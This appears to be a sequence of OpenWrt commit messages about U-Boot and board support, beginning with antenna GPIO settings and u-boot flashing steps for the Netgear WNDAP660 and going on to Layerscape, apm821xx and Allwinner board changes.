The antennae mux is controlled by GPIO 11 and GPIO14. Valid Configurations:
= Config# = | = GPIO 11 = | = GPIO 14 = | ===== Description =====
1. | 1 / High | 0 / Low | Use the internal antennae (default)
2. | 0 / Low | 1 / High | Use the external antennae
The external antennaes are only meant for the 2.4 GHz band.
One-way Flashing instructions via u-boot:
0. connect the serial cable to the RJ45 Console Port
Note: This requires a poper RS232 and not a TTL/USB adaptor.
1. power up the AP and interrupt the u-boot process at
'Hit any key to stop autoboot'
2. setup serverip and ipaddr env settings
Enter the following commands into the u-boot shell
# setenv ipaddr
# setenv serverip
3. download the factory.img image to the AP
Enter the following commands into the u-boot shell
# tftp ${kernel_addr_r} openwrt-apm821xx-nand-netgear_wndap660-squashfs-factory.img
4. verfiy image integrity
Enter the following commands into the u-boot shell
# crc32 $fileaddr $filesize
If the calculated crc32 checksum does not match, go back to step 3.
5. flash the image
Enter the following commands into the u-boot shell
# nand erase 0x110000 0x1bd0000
# nand write ${kernel_addr_r} 0x110000 ${filesize}
6. setup uboot environment
Enter the following commands into the u-boot shell
# setenv bootargs
# setenv fileaddr
# setenv filesize
# setenv addroot 'setenv bootargs ${bootargs} root=/dev/ubiblock0_0'
# setenv owrt_boot 'nboot ${kernel_addr_r} nand0 0x110000; run addroot; run addtty; bootm ${kernel_addr_r}'
# setenv bootcmd 'run owrt_boot'
# saveenv
7. boot
# run bootcmd
Booting initramfs instructions via u-boot:
Follow steps 0 - 2 from above.
3. boot initramfs
Enter the following commands into the u-boot shell
# tftp ${kernel_addr_r} openwrt-apm821xx-nand-netgear_wndap660-initramfs-kernel.bin
# run addtty
# bootm ${kernel_addr_r}
Signed-off-by: Christian Lamparter <>
This patch adds u-boot environment access to the MX60(W) target.
"The environment size is one NAND block (128KiB on Buckminster).
We allocate four NAND blocks to deal with bad blocks which may
exist in the saved environment"
Signed-off-by: Christian Lamparter <>
All apm821xx devices use u-boot and most of them have
an accessible u-boot environment. This patch adds the
necessary template file, but does not add the
uboot-envtools package to any of the targets.
Signed-off-by: Christian Lamparter <>
Also update the U-Boot BSP patch for I2SE Duckbill devices
and remove upstreamed patch for LibreSSL support.
Signed-off-by: Michael Heimpold <>
In dtc version 1.4.6 the macro names in header include guards changed,
but the build relies on them matching in order to replace selected
headers. This is a horrible hack to work around this.
Signed-off-by: Thomas Nixon <>
ls1012afrdm was no longer supported in NXP Layerscape SDK.
Instead a new board ls1012afrwy was introduced in LSDK.
This patch is to drop ls1012afrdm and add ls1012afrwy support.
Since only 2MB NOR flash could be used, we just put u-boot
and firmware on NOR flash, and put kernel/dtb/rootfs on SD
The Layerscape FRWY-LS1012A board is an ultra-low-cost
development platform for LS1012A Series Communication
Processors built on Arm Cortex-A53. This tool refines the
FRDM-LS1012A with more features for a better hands-on experience
for IoT, edge computing, and various advanced embedded
applications. Features include easy access to processor I/O,
low-power operation, micro SD card storage, an M2 connector, a
small form factor, and expansion board options via mikroBUS Click
Module. The MicroBUS Module provides easy expansion via hundreds
of powerful modules supporting sensors, actuators, memories,
and displays.
Signed-off-by: Yangbo Lu <>
NOR/QSPI Flash on Layerscape board only has limited 64MB memory size.
Since some boards (ls1043ardb/ls1046ardb/ls1088ardb/ls1021atwr)
could support SD card boot, we added SD boot support for them to put
all things on SD card to meet large memory requirement.
Signed-off-by: Yangbo Lu <>
The NXP TWR-LS1021A module is a development system based
on the QorIQ LS1021A processor.
- This feature-rich, high-performance processor module can
be used standalone or as part of an assembled Tower System
development platform.
- Incorporating dual Arm Cortex-A7 cores running up to 1 GHz,
the TWR-LS1021A delivers an outstanding level of performance.
- The TWR-LS1021A offers HDMI, SATA3 and USB3 connectors as
well as a complete Linux software developer's package.
- The module provides a comprehensive level of security that
includes support for secure boot, Trust Architecture and
tamper detection in both standby and active power modes,
safeguarding the device from manufacture to deployment.
Signed-off-by: Yangbo Lu <>
This patch is to implement u-boot environment txt files
to support OpenWrt boot for all layerscape devices.
Signed-off-by: Yangbo Lu <>
The u-boot source code had been migrated to codeaurora
for LSDK-18.06 release and the future release. This
patch is to update u-boot to LSDK-18.06 for both
uboot-layerscape and uboot-layerscape-armv8_32b packages.
Besides, this patch also introduced some other changes.
- Reworked uboot-layerscape makefile to make it more
- Define package in uboot-layerscape-armv8_32b for each board.
- Fixed u-boot package selection in target image makefile.
Signed-off-by: Yangbo Lu <>
Dropped uboot-layerscape patches which were environemnt patches.
We will make u-boot environment binaries with a txt file for all
Signed-off-by: Yangbo Lu <>
The NanoPi NEO2 is a small Allwinner H5 based board available with
different DRAM configurations.
This board is very similar to the NanoPi NEO PLUS2
Signed-off-by: Jasper Scholte <>
Follow the strategy of other targets and create a
default environment file, uEnv.txt, to configure the
behavior of U-Boot.
For now, use it to pass bootargs to the kernel
Signed-off-by: Luis Araneda <>
Create a directory inside STAGING_DIR and copy U-Boot
output images, so they can be used later when creating the
sdcard image
Additionally, like others targets, override the default
install method to avoid copying the images to bin directory
Signed-off-by: Luis Araneda <>
Select the U-Boot variant automatically based on the
current selected device, and hide the package from
Signed-off-by: Luis Araneda <>
The board was added when creating the target, but the
corresponding device was never defined inside the target
Signed-off-by: Luis Araneda <>